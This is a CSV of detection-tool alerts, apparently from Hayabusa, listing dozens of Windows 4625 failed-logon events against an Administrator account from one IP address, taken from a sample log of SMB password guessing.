2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz8BQAlyYXB61tx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkHLs6yikRWVjj9F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bQUcnUBCmE81G6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BceDCcXoHJQv9pDi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCCLt49g8wmAMEyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pM6C8KRcxVIUsZrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fw5DU6l3QRVl9cWY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37UthbuO3m4Lr7dU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: URB7Ji5pQleLtvy4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: orP9OgiBrYIKZPXE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZwvdnlIWhqoDg8On | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v6dXVbmLBpXc39ah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Mu7amiHAg0l7bza | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JdG6F697kAXFDx9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jY5AAnfQMH3VZQUa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVep4j7jZZAOAQAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KWWtGIQx8jBgAeoH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zn8X8gen8gX9i3QK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9OdUM99RBHzwgVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJbBVm6wDrqyQmpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAVRBfMxIyrfsEtR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wuCIClZihRxRyjGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxhpEP6nnmihvkHB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1HYmJDrWmKjj8DF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V81dIfR2SRNDk3a2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vaZpLaxB1kcCXqHP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRhs8IoV6R6vyCdL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wUYds3Ym3G2abrV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmBfxm6pPLlSEsUI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VbAuqFggx0zz5iEn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cytpVOjb4KrNaGg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BFFFt7eFzmlzbHhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJQBZZiNKVGXzx4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gyu6EyrtbyowTfC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aASpkRuPfE8Nl64n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MSI2b7LpZpWO3xJW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avNkOq3fsGN3yYJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wnlgy6dW33tRk6UX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: msJ8QrqMluTeUlM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H33NuKduMuskxL0D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BHjp69CD1ttbaK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uxByLPApvfeIhU2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6g0WOAnoGpKyEyzW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P8MTs4Nkbm3ryqcp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Nyd7tr3y0BHmPLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J5KiDQOEnDf6xEPN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3MBP1buuRcBRiQTG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXdcg3MSqnGSvax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kej7zgIDCNR5tnnp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM8SOeQXwytB6iw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XPNATM0IL05vtbZ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H56ci5gbBVzebS2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rRofLg1uxrojU7n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MAhtwTU8OttAhcxf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CwKgAR6OWbkFlxUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lNZR4G0DVsXVg4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZG99tl0RRN3cQoK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nwRzAutxa07Y1xE4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OwhvrVBSRa8RcCKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bLBwBys2favoK7BQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3oYpj1rGcsOWNSs7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IBogtzE6No62tJB9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQJICDi3T4LiwXZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnlKkfHYT0ID3BWr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gw36XaWrYp2M9CZd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aT76CAAER0H98I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TEOZfrP3IYmutAuq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd54DAwwp0BJhhaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AR6Gc128RlPtwcPl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cpjS1YZy2sSRqzI3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKeate89Gw1oEp0U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tBhApsBYa65Hxr0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITv5RS3WHhWe0Hez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WASvcAp9zfU3uSka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
